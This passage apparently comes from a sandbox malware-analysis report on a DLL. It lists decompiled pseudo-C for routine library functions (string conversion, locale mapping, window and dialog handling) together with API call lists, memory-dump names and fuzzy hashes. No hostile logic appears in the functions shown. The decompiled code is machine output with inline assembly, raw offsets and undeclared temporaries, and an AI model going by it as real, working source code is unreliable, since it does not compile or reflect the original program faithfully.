								if(E10019797(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x10037b70; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018F3F( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}

APIs

Part of subcall function 10018F3F: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018FB1

__allrem.LIBCMT ref: 1001385A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001387B
__allrem.LIBCMT ref: 10013897
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100138BA
__allrem.LIBCMT ref: 100138D6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100138F9

Part of subcall function 10019797: __lock.LIBCMT ref: 100197A5

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
String ID:
API String ID: 1282128132-0
Opcode ID: ff426bf6f2de5c04749d9f75f2a35f684fd423b36e88f3697f4bd91450d6212b
Instruction ID: 35bf0928db20a43a027534d155e439d1ad7f1c48823d0ead1cebc8bc97c17753
Opcode Fuzzy Hash: ff426bf6f2de5c04749d9f75f2a35f684fd423b36e88f3697f4bd91450d6212b
Instruction Fuzzy Hash: F2619EB1A00605AFDB24CF68C881A5DBBF5FB44364F20816EE459EB291D770EE86DB00

Uniqueness

Uniqueness Score: -1.00%

Function 10018622 Relevance: 9.1, APIs: 6, Instructions: 145
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E10018622(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x1002f210);
				E10012CE0(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1003a4dc - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x1002e9cc, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1003a4dc = 2;
						}
					} else {
						 *0x1003a4dc = 1;
					}
				}
				_t42 =  *0x1003a4dc; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1003a4c0; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1003a4d0; // 0x0
					}
					_t43 = E10019AB4(_t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(_t83 != 0) {
								_push(_t83);
								E1001111B();
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E10019AF7(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E10012D1B(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1003a4d0; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E100116D0(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10012400(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E1001111B();
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E10013955(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
							 *(_t85 - 0x20) = 1;
							goto L15;
						}
					}
				}
			}

APIs

GetStringTypeW.KERNEL32(00000001,1002E9CC,00000001,?,1002F210,0000001C,100126EF,00000001,00000020,00000100,?,00000000), ref: 10018646
GetLastError.KERNEL32 ref: 10018658
MultiByteToWideChar.KERNEL32(?,00000000,00000000,100129C0,00000000,00000000,1002F210,0000001C,100126EF,00000001,00000020,00000100,?,00000000), ref: 100186BA
MultiByteToWideChar.KERNEL32(?,00000001,00000000,100129C0,?,00000000), ref: 10018738
GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 1001874A

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: 9e7710add94300a0b692bc124a61e5eff74299164c9d089cdf89c9ca6e0ffffa
Instruction ID: 72fb5dbd7d0f1b114274a67e54598b18d63c25f91f6341cba252275a418feeec
Opcode Fuzzy Hash: 9e7710add94300a0b692bc124a61e5eff74299164c9d089cdf89c9ca6e0ffffa
Instruction Fuzzy Hash: 0C417935800629AFDB12CF608C89AAE3BB5EF497A0F214105F910AE1A1D731DBD1DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000F5DD Relevance: 9.1, APIs: 6, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E1000F5DD(void* __ecx, void* __edx) {
				signed int _t73;
				intOrPtr _t85;
				intOrPtr* _t89;
				intOrPtr* _t92;
				intOrPtr* _t94;
				void* _t99;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t122;
				void* _t124;
				void* _t126;
				void* _t128;
				void* _t129;

				_t117 = __edx;
				E10011A8C(E1002AD8F, _t126);
				_t129 = _t128 - 0x6c;
				_t73 = 0;
				_t124 = __ecx;
				 *((intOrPtr*)(__ecx + 0x44)) = 1;
				 *(_t126 - 0x10) = 0;
				 *(_t126 - 0x18) = 0;
				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
					L21:
					 *(_t124 + 0x44) =  *(_t124 + 0x44) & 0x00000000;
					 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
					return 0;
				}
				do {
					_t109 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x14)) + (_t73 + _t73 * 4 << 3) + 0x24));
					if(_t109 == 0) {
						goto L19;
					}
					_t110 =  *((intOrPtr*)(_t109 + 4));
					 *((intOrPtr*)(_t126 - 0x20)) = _t110;
					if(_t110 == 0) {
						goto L19;
					}
					 *(_t126 - 0x14) =  *(_t126 - 0x10) << 4;
					do {
						_t122 =  *((intOrPtr*)(E10007404(_t126 - 0x20)));
						 *((intOrPtr*)(_t126 - 0x24)) = 0xfffffffd;
						E10012400(_t126 - 0x78, 0, 0x20);
						_t129 = _t129 + 0xc;
						E1001064A(_t126 - 0x48);
						 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
						_t135 =  *((intOrPtr*)(_t124 + 0x48));
						if( *((intOrPtr*)(_t124 + 0x48)) == 0) {
							_t85 =  *((intOrPtr*)(_t124 + 0x40)) +  *(_t126 - 0x14);
							__eflags = _t85;
						} else {
							_t99 = E1000F0B5(_t124, _t117, _t135, _t126 - 0x58,  *(_t126 - 0x18) + 1);
							 *(_t126 - 4) = 1;
							E10010630(_t99, _t126 - 0x48, _t99);
							 *(_t126 - 4) = 0;
							__imp__#9(_t126 - 0x58);
							_t85 = _t126 - 0x48;
						}
						 *((intOrPtr*)(_t126 - 0x38)) = _t85;
						 *((intOrPtr*)(_t126 - 0x34)) = _t126 - 0x24;
						 *((intOrPtr*)(_t126 - 0x30)) = 1;
						 *((intOrPtr*)(_t126 - 0x2c)) = 1;
						 *(_t122 + 0x84) = 1;
						_t89 =  *((intOrPtr*)(_t122 + 0x4c));
						if(_t89 != 0) {
							_t117 = _t126 - 0x1c;
							_push(_t126 - 0x1c);
							_push(0x1002cfe8);
							_push(_t89);
							if( *((intOrPtr*)( *_t89))() >= 0) {
								_t92 =  *((intOrPtr*)(_t126 - 0x1c));
								_t117 = _t126 - 0x38;
								 *((intOrPtr*)( *_t92 + 0x18))(_t92,  *((intOrPtr*)(_t122 + 0x98)), 0x1002fb68, 0, 4, _t126 - 0x38, 0, _t126 - 0x78, _t126 - 0x28);
								_t94 =  *((intOrPtr*)(_t126 - 0x1c));
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								 *(_t122 + 0x84) =  *(_t122 + 0x84) & 0x00000000;
								if( *((intOrPtr*)(_t126 - 0x74)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x74)));
								}
								if( *((intOrPtr*)(_t126 - 0x70)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x70)));
								}
								if( *((intOrPtr*)(_t126 - 0x6c)) != 0) {
									__imp__#6( *((intOrPtr*)(_t126 - 0x6c)));
								}
								 *(_t126 - 0x10) =  *(_t126 - 0x10) + 1;
								 *(_t126 - 0x14) =  *(_t126 - 0x14) + 0x10;
							}
						}
						 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
						__imp__#9(_t126 - 0x48);
					} while ( *((intOrPtr*)(_t126 - 0x20)) != 0);
					_t73 =  *(_t126 - 0x18);
					L19:
					_t73 = _t73 + 1;
					 *(_t126 - 0x18) = _t73;
				} while (_t73 <  *((intOrPtr*)(_t124 + 0x10)));
				goto L21;
			}

APIs

__EH_prolog.LIBCMT ref: 1000F5E2
VariantClear.OLEAUT32(?), ref: 1000F694
SysFreeString.OLEAUT32(00000000), ref: 1000F715
SysFreeString.OLEAUT32(00000000), ref: 1000F724
SysFreeString.OLEAUT32(00000000), ref: 1000F733
VariantClear.OLEAUT32(00000000), ref: 1000F748

Part of subcall function 1000F0B5: __EH_prolog.LIBCMT ref: 1000F0BA
Part of subcall function 1000F0B5: VariantClear.OLEAUT32(?), ref: 1000F11C

Part of subcall function 10010630: VariantCopy.OLEAUT32(?,?), ref: 10010638

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$ClearFreeString$H_prolog$Copy
String ID:
API String ID: 3098219910-0
Opcode ID: d6e461061404aa7110846635b78fe777096a90a479a0edbbc710177d16e33837
Instruction ID: d0e020890206fa544cdbdc31bb25f29c8d17751cf2acc9d8ee25091c18e8f44e
Opcode Fuzzy Hash: d6e461061404aa7110846635b78fe777096a90a479a0edbbc710177d16e33837
Instruction Fuzzy Hash: B85147B1900609DFEB54CFA8C884BEEBBB8FF48345F10012DE11AEB695D775A945CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10025B82 Relevance: 9.1, APIs: 6, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10025B82(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t7;
				void* _t13;
				struct HWND__** _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				struct HWND__* _t18;

				_t18 = _a4;
				_t17 = _t18;
				if(_t18 != 0) {
					L5:
					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
						L8:
						_t16 = _t17;
						_t7 = _t17;
						if(_t17 == 0) {
							L10:
							if(_t18 == 0 && _t17 != 0) {
								_t17 = GetLastActivePopup(_t17);
							}
							_t15 = _a8;
							if(_t15 != 0) {
								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
									 *_t15 =  *_t15 & 0x00000000;
								} else {
									 *_t15 = _t16;
									EnableWindow(_t16, 0);
								}
							}
							return _t17;
						} else {
							goto L9;
						}
						do {
							L9:
							_t16 = _t7;
							_t7 = GetParent(_t7);
						} while (_t7 != 0);
						goto L10;
					}
					_t17 = GetParent(_t17);
					L7:
					if(_t17 != 0) {
						goto L5;
					}
					goto L8;
				}
				_t13 = E10025B49();
				if(_t13 != 0) {
					L4:
					_t17 =  *(_t13 + 0x1c);
					goto L7;
				}
				_t13 = E10006E47();
				if(_t13 != 0) {
					goto L4;
				}
				_t17 = 0;
				goto L8;
			}

APIs

GetWindowLongA.USER32 ref: 10025BB4
GetParent.USER32(?), ref: 10025BC2
GetParent.USER32(?), ref: 10025BD5
GetLastActivePopup.USER32(?), ref: 10025BE4
IsWindowEnabled.USER32(?), ref: 10025BF9
EnableWindow.USER32(?,00000000), ref: 10025C0C

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: f546e8be2e24b85187661f69a342f864b22fd1f965cfd822eb4daf6f070cda95
Instruction ID: eef36b0e69d94cf7a6bfa3ed5178a409b44f01464191526325d0f495a7c3fed6
Opcode Fuzzy Hash: f546e8be2e24b85187661f69a342f864b22fd1f965cfd822eb4daf6f070cda95
Instruction Fuzzy Hash: F41151326017365BD263EA696CC0B1EB2ECDF45AA3FA24115EC06D7212DB72DC0146E9

Uniqueness

Uniqueness Score: -1.00%

Function 10025364 Relevance: 9.0, APIs: 6, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10025364(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}

0x10025373
0x100253c4
0x100253c4
0x100253c6
0x100253ca
0x00000000
0x00000000
0x10025390
0x100253a7
0x100253ad
0x100253bf
0x00000000
0x100253d2
0x100253bf
0x100253c4
0x100253c4
0x100253cf

APIs

ClientToScreen.USER32(?,?), ref: 10025373
GetDlgCtrlID.USER32 ref: 10025387
GetWindowLongA.USER32 ref: 10025395
GetWindowRect.USER32 ref: 100253A7
PtInRect.USER32(?,?,?), ref: 100253B7
GetWindow.USER32(?,00000005), ref: 100253C4

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: b209f59fc19bdd5bf6ab9cb9d3746cc2aee40968c7130de26e90267ab12c8d46
Instruction ID: f29aa1391cdb4093ea9c1d2b87e7f35b414104477a39d1cbb50fc2286be9e58f
Opcode Fuzzy Hash: b209f59fc19bdd5bf6ab9cb9d3746cc2aee40968c7130de26e90267ab12c8d46
Instruction Fuzzy Hash: 4F01D63110062ABBDB11EF549C88EDE37BCEF007D2F945015FD12A6161D771DB129B98

Uniqueness

Uniqueness Score: -1.00%

Function 10020BD1 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10020BD1(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001E164();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1002776D() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10012400( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E100209E9(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10020B06(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

SendMessageA.USER32(00000000,00000405,00000000,?), ref: 10020C87
GetWindowLongA.USER32 ref: 10020C99
GetWindowLongA.USER32 ref: 10020CAA
SetWindowLongA.USER32 ref: 10020CC6

Strings

(, xrefs: 10020C7D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: 0b6acb89b732486343ceec0c97bf216dde0e4bab9400b203ec829346fde65810
Instruction ID: 95e974d3db5210fca6443694d2ff9e1c0aed1c225dc02d5b9e11b7c39b1793d1
Opcode Fuzzy Hash: 0b6acb89b732486343ceec0c97bf216dde0e4bab9400b203ec829346fde65810
Instruction Fuzzy Hash: D931CFB46007159FDB11EFA8E884A5AB7FAFF04250F61462DF54297693DB30E841CB94

Uniqueness

Uniqueness Score: -1.00%

Function 10014796 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E10014796(void* __ecx, void* __eflags) {
				void* _t55;

				E100114D8(__ecx, __eflags);
				 *((intOrPtr*)(_t55 - 0x1c)) = 0;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				__eflags =  *(__ebp - 0x1c);
				if( *(__ebp - 0x1c) != 0) {
					L5:
					__eax = WideCharToMultiByte( *(__ebp + 0x20), __ebx,  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__eflags = __eax;
					if(__eax == 0) {
						L21:
						__edi =  *(__ebp - 0x34);
						L22:
						__eflags =  *(__ebp - 0x28) - __ebx;
						if( *(__ebp - 0x28) != __ebx) {
							__eax = E1001111B();
							__ecx = __edi;
						}
						__eflags =  *((intOrPtr*)(__ebp - 0x2c)) - __ebx;
						if( *((intOrPtr*)(__ebp - 0x2c)) != __ebx) {
							_push( *(__ebp - 0x1c));
							__eax = E1001111B();
							_pop(__ecx);
						}
						__eax =  *(__ebp - 0x24);
						L27:
						return E10012D1B(0);
					}
					__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __ebx, __ebx);
					__esi = __eax;
					 *(__ebp - 0x30) = __esi;
					__eflags = __esi - __ebx;
					if(__esi == __ebx) {
						goto L21;
					}
					 *(__ebp - 4) = __edi;
					__eax =  &(__eax[3]);
					__eax = E100116D0(__eax, __ecx);
					 *(__ebp - 0x18) = __esp;
					__edi = __esp;
					 *(__ebp - 0x34) = __edi;
					 *(__ebp - 4) =  *(__ebp - 4) | 0xffffffff;
					__eflags = __edi - __ebx;
					if(__edi != __ebx) {
						L11:
						__eax = LCMapStringA( *(__ebp + 8),  *(__ebp + 0xc),  *(__ebp - 0x1c),  *(__ebp - 0x20), __edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags =  *(__ebp + 0xd) & 0x00000004;
							if(( *(__ebp + 0xd) & 0x00000004) == 0) {
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									_push( *(__ebp + 0x1c));
									_push( *((intOrPtr*)(__ebp + 0x18)));
								} else {
									_push(__ebx);
									_push(__ebx);
								}
								 *(__ebp - 0x24) = MultiByteToWideChar( *(__ebp + 0x20), 1, __edi, __esi, ??, ??);
							} else {
								 *(__ebp - 0x24) = __esi;
								__eflags =  *(__ebp + 0x1c) - __ebx;
								if( *(__ebp + 0x1c) != __ebx) {
									__eflags =  *(__ebp + 0x1c) - __esi;
									if( *(__ebp + 0x1c) < __esi) {
										__esi =  *(__ebp + 0x1c);
									}
									__eax = E10019990( *((intOrPtr*)(__ebp + 0x18)), __edi, __esi);
								}
							}
						}
						goto L22;
					} else {
						__edi = E10011233(__esi);
						__eflags = __edi - __ebx;
						if(__edi == __ebx) {
							goto L22;
						}
						 *(__ebp - 0x28) = 1;
						goto L11;
					}
				} else {
					__eax = E10011233( *(__ebp - 0x20));
					 *(__ebp - 0x1c) = __eax;
					__eflags = __eax;
					if(__eax == 0) {
						goto L1;
					}
					 *((intOrPtr*)(__ebp - 0x2c)) = 1;
					goto L5;
				}
				L1:
				goto L27;
			}

APIs

Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 100114F2
Part of subcall function 100114D8: GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 10011503
Part of subcall function 100114D8: VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 10011549

WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000,?,?), ref: 100147D4
LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000,?,?), ref: 100147F0
LCMapStringA.KERNEL32(?,?,?,?,?,00000000,?,?), ref: 1001485C
_strncpy.LIBCMT ref: 10014881

Strings

@hvpYv, xrefs: 100147D4

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: QueryStringVirtual$ByteCharInfoMultiSystemWide_strncpy
String ID: @hvpYv
API String ID: 1411509361-2766943729
Opcode ID: 23dabd8ce938acf1019d2c549cce85f890423a1236ca905f218f127779b1fe5f
Instruction ID: b4e8bfe9618fd34d7640ff0de57aa03a35dd0412442fb7acc563b54c727098f6
Opcode Fuzzy Hash: 23dabd8ce938acf1019d2c549cce85f890423a1236ca905f218f127779b1fe5f
Instruction Fuzzy Hash: 45311072C0015AABCF11DF94CC859DEBBB5FF48350F264129FA246A160CB35C991DB54

Uniqueness

Uniqueness Score: -1.00%

Function 1001ECC2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001ECC2(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t12;
				struct HWND__* _t14;
				struct HWND__* _t17;
				struct HWND__** _t24;
				void* _t25;

				_t24 = _a4;
				_t25 = __ecx;
				if(E1001F67B(__ecx, _t24) != 0) {
					L12:
					return 1;
				}
				_t12 = E100212E7(__ecx);
				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x64)) == 0) {
					if(_t24[1] != 0x100) {
						L13:
						return E1001FF99(_t24);
					}
					_t14 = _t24[2];
					if(_t14 == 0x1b || _t14 == 3) {
						if((GetWindowLongA( *_t24, 0xfffffff0) & 0x00000004) == 0 || E1002522B( *_t24, ?str?) == 0) {
							goto L13;
						} else {
							_t17 = GetDlgItem( *(_t25 + 0x1c), 2);
							if(_t17 == 0 || IsWindowEnabled(_t17) != 0) {
								SendMessageA( *(_t25 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

APIs

GetWindowLongA.USER32 ref: 1001ED03
GetDlgItem.USER32 ref: 1001ED22
IsWindowEnabled.USER32(00000000), ref: 1001ED2D
SendMessageA.USER32(?,00000111,00000002,00000000), ref: 1001ED43

Strings

Edit, xrefs: 1001ED0D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
